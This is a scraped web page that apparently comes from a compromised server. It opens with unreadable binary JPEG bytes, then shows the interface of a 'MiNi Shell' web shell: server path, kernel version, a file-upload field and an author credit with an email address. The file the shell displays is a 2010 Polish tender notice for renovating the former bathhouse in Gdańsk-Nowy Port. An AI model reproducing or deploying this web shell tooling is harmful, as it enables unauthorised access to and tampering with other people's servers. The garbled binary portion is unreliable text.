JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20100524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20100524/132191-N-2010.html

<p class="kh_header"><b>Gdańsk: Przebudowa i remont pomieszczeń  budynku dawnej łaźni miejskiej przy ul. Strajku Dokerów 5 w Gdańsku - Nowym Porcie - etap III</b><br>
<b>Numer ogłoszenia: 132191 - 2010; data zamieszczenia: 24.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Sztuki Współczesnej "Łaźnia" , ul. Jaskółcza 1, 81-767 Gdańsk, woj. pomorskie, tel. 0-58 305 40 50, faks 0-58 305 26 80.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.laznia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i remont pomieszczeń  budynku dawnej łaźni miejskiej przy ul. Strajku Dokerów 5 w Gdańsku - Nowym Porcie - etap III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych: Przebudowa i remont pomieszczeń budynku dawnej łaźni miejskiej przy ul. Strajku Dokerów 5 w Gdańsku - Nowym Porcie. Prace mają na celu dostosowanie obiektu do potrzeb kulturalnych (twórczych, wystawienniczych, kinowych, bibliotecznych, edukacyjnych) i zamieszkania zbiorowego (pokoje gościnne) - III etap. 
2. Budynek został wpisany do rejestru zabytków pod nr 1829, decyzją Pomorskiego Wojewódzkiego Konserwatora Zabytków z dnia 10.07.2009r. Ponadto jest on usytuowany w obszarze zabytkowego układu urbanistycznego osady portowej w Nowym Porcie, wpisanym do rejestru zabytków, decyzją Wojewódzkiego Konserwatora Zabytków w Gdańsku, z dnia 08 06.1982., pod numerem 846 (nowy nr 1013).
3. Przedmiot zamówienia obejmuje:
1) Roboty ziemne, roboty drogowe - roboty w zakresie różnych nawierzchni; roboty rozbiórkowe - roboty w zakresie burzenia:
-opracowanie projektu i załatwienie formalności związanych z zajęciem pasa drogowego i zmianą organizacji ruchu (uwaga: płatność związana z zajęciem pasa drogowego po stronie Zamawiającego);
- rozebranie nawierzchni drogowej i chodników oraz wykonanie zabezpieczonych wykopów w celu odcięcia istniejących, nieprzydatnych przyłączy wodociągowych i kanalizacji sanitarnej oraz odtworzenie studni na istniejącym przykanaliku sanitarnym;
- zasypanie wykopów z zagęszczeniem (z częściowym dowozem żwiru) i odtworzenie nawierzchni oraz załatwienie formalności związanych z odbiorem robot drogowych przez inspektora Zarządu Dróg i Zieleni w Gdańsku;
- rozbiórka żelbetowych biegów i spoczników wschodniej klatki schodowej - K2;
- przebicie otworu drzwiowego w murze z cegły; 
-przebicia otworów w stropach żelbetowych i ścianach ceglanych na wentylację 
- przewiezienie i przerzucenie gruzu z rozbiórek do pomieszczenia otwartej piwnicy w siedzibie Zamawiającego przy ul. Jaskółczej 1 w Gdańsku; wywóz i utylizacja elementów bitumicznych.
2) Roboty betonowe i żelbetowe, roboty konstrukcyjne z wykorzystaniem stali:
- wykonanie szalowania i zbrojenia biegów, belek i płyt podestowych schodów klatki wschodniej - K2;
- wykonanie nadproży drzwiowych z profili stalowych, osiatkowanie i otynkowanie;
-wypełnienie istniejących kanałów wentylacyjnych w ścianach zewnętrznych przezbrajana mieszanką betonową.
3) Roboty izolacyjne i odgrzybieniowe:
-odgrzybienie natryskowo środkami chemicznymi zainfekowanych ścian ceglanych;
-ułożenie płyt ze styropianu samo gasnącego twardego EPS 250-036 /FS-40/ w warstwach posadzkowych pomieszczeń parteru, I piętra i niższych poddaszy
- ułożenie foli budowlanej w posadzkach pomieszczeń parteru, I piętra i niższych poddaszy,
- układanie wełny mineralnej w rusztach ścianek działowych pomieszczeń I i II piętra, niższych poddaszy i poddasza,
- smarowanie posadzek folią w płynie pod płytki gresowe w pomieszczeniach sanitarnych parteru, I piętra i poddasza
4) Roboty tynkowe, roboty z gipsu i prefabrykatów gipsowych; roboty tynkowe i okładziny wewnętrzne; sufity podwieszane - ruszty metalowe:
-wykonanie tynków cementowo-wapiennych kat. III ścian, sufitów, podciągów i biegów schodowych,
-wykonanie obudów instalacji z rusztów metalowych; 
-obłożenie rusztów metalowych jednostronnie lub dwustronnie, dwukrotnie płytami GKF i GKFI gr. 15 mm; 
-gładzenie ścian; 
-licowanie ścian płytkami ceramicznymi glazurowanymi 
5) Roboty posadzkarskie i wykładzinowe:
-wykonanie warstw podkładowych pomieszczeń parteru; 
-wykonanie zbrojonych warstw wyrównawczych posadzek pomieszczeń; 
-kładzenie płytek gresowych i cokolików na klej elastyczny z fugowaniem elastycznym 
6) Montaż i demontaż rusztowań wewnętrznych.
7) Przyłącza sanitarne wodociągowe i kanalizacyjne - wykonanie odcięć przyłączy i załatwienie formalności związanych z odbiorem robót przez inspektora SAUR Neptun Gdańsk.
8) Instalacje sanitarne - wentylacyjne i c.o.:
- montaż rur ze stali nierdzewnej dn=160
- montaż szafek rozdzielczych c.o.; montaż rur izolowanych z tworzywa sztucznego, podejść, zaworów i grzejników drabinkowych w łazienkach; wykonanie prób szczelności
9) Pomiary geodezyjne
dwukrotne pomiary geodezyjne - na początku i pod koniec realizacji zadania - stalowo-żelbetowego stropu nad II piętrem,
10) Stolarka okienna i obróbki blacharskie:
- wykonanie i montaż nieotwieranego okna, wykonanie i montaż parapetów okiennych i obróbek blacharskich z blachy tytanowo-cynkowej. 

4. Szczegółowy opis przedmiotu zamówienia, określony jest w dokumentacji projektowej, na którą składa się:
1) Projekt budowlany przebudowy i remontu pomieszczeń budynku dawnej łaźni miejskiej wraz z zagospodarowaniem terenu przy ul. Strajku Dokerów 5 w Gdańsku Nowym Porcie w celu dostosowania obiektu do potrzeb kulturalnych (twórczych, wystawienniczych, kinowych, bibliotecznych, edukacyjnych i zamieszkania zbiorowego)
2) pozwolenie Miejskiego Konserwatora Zabytków na prowadzenie prac przy zabytku i pozwolenie na budowę
3) przedmiary robót
4) specyfikacje techniczne wykonania i odbioru robót (STWIOR).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 50% wartości zamówienia podstawowego - powtórzenie tego samego rodzaju
zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.11.10.00-8, 45.11.12.00-0, 45.11.00.00-1, 45.23.31.40-2, 45.23.32.00-1, 45.11.11.00-9, 45.22.32.10-1, 45.26.23.00-4, 45.26.23.10-7, 45.26.23.11-4, 45.22.32.10-1, 45.26.26.50-2, 45.26.26.00-7, 45.41.00.00-4, 45.40.00.00-1, 45.42.11.46-9, 45.43.21.00-2, 45.26.21.10-5, 45.26.21.20-8, 45.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 20000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek wiedzy i doświadczenia będzie potwierdzony jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał minimum dwa zamówienia polegające na budowie, przebudowie lub remoncie budynku o wartości jednego zamówienia co najmniej 800.000,00 zł, w tym przynajmniej jednego na budynku wpisanym do rejestru zabytków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia będzie potwierdzony, jeżeli wykonawca wykaże, że dysponuje:
a) kierownikiem budowy, posiadającym:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności budowlano-konstrukcyjnej, 
b) osobą kierującą robotami budowlanymi przy zabytku nieruchomym, posiadającą uprawnienia do kierowania robotami budowlanymi przy zabytkach nieruchomych zgodnie z Rozporządzeniem Ministra Kultury z dnia 9 czerwca 2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych, t.j.: 
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności budowlano-konstrukcyjnej,
- przebytą co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych;
c) kierownikiem robót w branży sanitarnej, 
- posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, bez ograniczeń;
Uwaga. Zamawiający uznaje uprawnienia budowlane w wyżej wymienionym zakresie uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2006 r. Nr 156, poz. 1118, z późn. zm.), zgodnie z art. 104 tejże ustawy.
	Funkcje wskazane w lit. a i b może pełnić ta sama osoba</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek finansowy będzie potwierdzony jeżeli wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej, kontraktowe i deliktowe, za szkody osobowe i rzeczowe wyrządzone w związku z prowadzoną działalnością gospodarczą, na sumę ubezpieczenia nie niższą niż 500 tys. zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy mogą dotyczyć:
1)	wynagrodzenia wykonawcy, tylko w przypadku ustawowej zmiany opodatkowania
2)	warunków płatności,
3)	terminu realizacji zamówienia,
4)	zakresu robót w stopniu nie wykraczającym poza określenie przedmiotu zamówienia zawarte w SIWZ,
5)	zmiany osób uczestniczących w wykonywaniu zamówienia po stronie Wykonawcy i osób nadzorujących wykonanie zamówienia po stronie Zamawiającego,
6)	podwykonawstwa za uprzednią zgodą zamawiającego:
a)	powierzenia podwykonawcom innej części robót niż wskazana w ofercie wykonawcy,
b)	zmiany podwykonawcy na etapie realizacji robót,
7)	technologii wykonywania robót lub rozwiązań projektowych.
Zmiany mogą być dokonane w przypadku:
1)	wystąpienia konieczności wykonania robót zamiennych, wynikającej z:
a)	zmiany technologii wykonania robót, rodzaju materiałów, zaleconych przez inspektora nadzoru, lub projektanta,
b)	zmiany dokumentacji projektowej, w szczególności w przypadku konieczności zwiększenia bezpieczeństwa wykonania robót lub usprawnienia procesu budowy (art. 23 pkt. 1 Prawa budowlanego), lub wskutek poprawienia błędów projektowych,
c)	z uwagi na postęp techniczny lub zmiany obowiązujących przepisów techniczno-budowlanych;
2)	wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają wprowadzenie zmian do umowy;
3)	zlecenia wykonania robót dodatkowych lub zamiennych, które wymagają dodatkowego czasu na wykonanie zamówienia;
4)	zmian w dokumentacji projektowej,  w tym:  wymagającej czasu do dostosowania się wykonawcy do takiej zmiany;
5)	opóźnienia zamawiającego w przekazaniu placu budowy, 
6)	zawieszenia robót przez Zamawiającego;
7)	wyjątkowo niesprzyjających warunków atmosferycznych;
8)	rezygnacji z części robót, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy (zmniejszenie wynagrodzenia o wartość niewykonanych robót);
9)	ustawowej zmiany stawki podatku od towarów i usług (VAT);
10)	w przypadkach określonych we wzorze umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.laznia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> j.w. lub biuro@bozp.com.pl, lub Centrum Sztuki Współczesnej Łaźnia ul. Jaskółcza 1, 80 - 767 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2010 godzina 09:00, miejsce: Centrum Sztuki Współczesnej Łaźnia ul. Jaskółcza 1, 80 - 767 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com